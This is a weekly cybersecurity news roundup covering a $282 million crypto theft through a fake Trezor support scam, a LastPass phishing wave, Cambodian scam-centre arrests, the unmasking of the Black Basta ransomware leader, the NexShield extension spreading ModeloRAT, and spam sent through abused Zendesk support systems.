Убийственное мошенничество: кража $282 млн, аресты в Камбодже и новые угрозы кибербезопасности Deadly Fraud: $282 Million Heist, Arrests in Cambodia, and New Cybersecurity Threats

We have compiled the most significant cybersecurity news from the past week.

On January 10, 2026, one of the most extensive social engineering attacks was recorded, resulting in the victim losing $282 million worth of Bitcoin and Litecoin. This was highlighted by blockchain investigator ZachXBT.

The user inadvertently gave their seed phrase from a hardware wallet to a scammer posing as a Trezor support staff member. With this access, the hacker withdrew 2,050,000 LTC and 1,459 BTC.

The perpetrator utilized the decentralized protocol THORChain to convert the assets into Monero, which subsequently led to a local pump. Experts from ZeroShadow quickly tracked the transaction chain and managed to freeze approximately $700,000.

On January 20, the creators of the password manager LastPass warned users about a new phishing campaign disguised as maintenance notifications.

Hackers are sending emails urging recipients to urgently back up their password vault within 24 hours. The notification includes a link that supposedly directs users to a page for creating an encrypted backup, but clicking the «Create Backup Now» button leads to a phishing site.

Through this method, the attackers aim to steal the victims’ master passwords. Experts believe that this malicious campaign began on January 19.

In the past week, thousands of people, including victims of human trafficking, have left scam centers in Cambodia due to the authorities’ crackdown on crime. This was reported by BBC.

Phnom Penh has initiated a new round of order enforcement in scam camps—large complexes where hundreds of individuals partake in schemes that defraud victims worldwide of billions of dollars.

According to experts, many find themselves in such places through deception, while some work there voluntarily.

On January 15, a businessman named Khuong Lee was arrested in Cambodia on suspicion of illegal recruitment and exploitation, fraud, and money laundering. In March 2023, he was featured in a BBC Eye investigation into fraudulent centers in Southeast Asia.

The program showcased a complex in the resort city of Sihanoukville owned by Lee, where individuals were lured from other countries into labor camps and forced to work overnight and engage in scams.

Law enforcement authorities in Germany and Ukraine have identified the leader of the Black Basta ransomware group—a 35-year-old Russian national named Oleg Nefedov. Interpol and Europol have placed the scammer, known online as tramp and kurva, on their most wanted list, as reported by the Cyber Police of Ukraine.

Investigators have established a connection between Nefedov and the now-disbanded Conti syndicate, of which Black Basta is a direct successor following its rebranding in 2022.

During raids in the Ivano-Frankivsk and Lviv regions, two members of the group specializing in hacking secure systems and stealing passwords were apprehended. They provided initial access to networks of major corporations, paving the way for data encryption and subsequent multi-million-dollar ransom demands.

Digital storage devices and significant amounts of cryptocurrency were seized during the searches.

Throughout its existence, Black Basta has attacked over 700 organizations, including critical infrastructure targets: the German defense contractor Rheinmetall, the European branch of Hyundai, and the UK telecom company BT Group.

The KongTuke group has begun widespread distribution of the malicious NexShield extension for Chrome and Edge. This was reported by cybersecurity researchers from Huntress.

According to experts, the malicious extension masquerades as a lightweight ad blocker. It intentionally overloads memory and processor resources, causing tab freezes and total browser crashes, prompting users to seek system recovery.

After a forced restart, NexShield presents a fake security window offering to scan the system.

Under the guise of resolving the issue, the software instructs users to copy a command into the clipboard and execute it in the Windows command line. In reality, this action launches a script that installs a new remote access Trojan—ModeloRAT.

Experts indicate that the primary target is the corporate sector. The virus has a 60-minute delay to avoid suspicion and primarily activates in the organizational domain networks. Once inside, ModeloRAT allows hackers to conduct extensive reconnaissance, modify the system registry, install third-party software, and covertly control the victim’s computer.

Researchers from Huntress noted that simply removing the extension from the browser will not resolve the issue, as the Trojan is deeply embedded in the system. They advised PC owners to conduct a thorough antivirus scan and never execute commands suggested by websites or extensions.

Users worldwide have become targets of a mysterious spam wave originating from unsecured systems of the cloud support service Zendesk. On January 18, victims reported receiving hundreds of emails.

Evidently, the messages do not contain malicious links or overt phishing attempts. However, the volume and chaotic nature of the distribution are concerning to recipients.

The emails feature bizarre subjects: some mimic requests from law enforcement agencies or content blocking demands, while others offer free Discord Nitro or contain pleas like «Help me!».

According to BleepingComputer, the emails are generated by support platforms of companies using Zendesk for customer service. The attackers exploited a loophole that allows unauthorized users to send inquiries for automatic responses.

Affected companies include: Discord, Tinder, Riot Games, Dropbox, CD Projekt (2k.com), Maya Mobile, NordVPN, the Tennessee Department of Labor, Lightspeed, CTL, Kahoot, Headspace, and Lime.

Zendesk representatives informed the publication that they have implemented new security features to detect and prevent such spam in the future.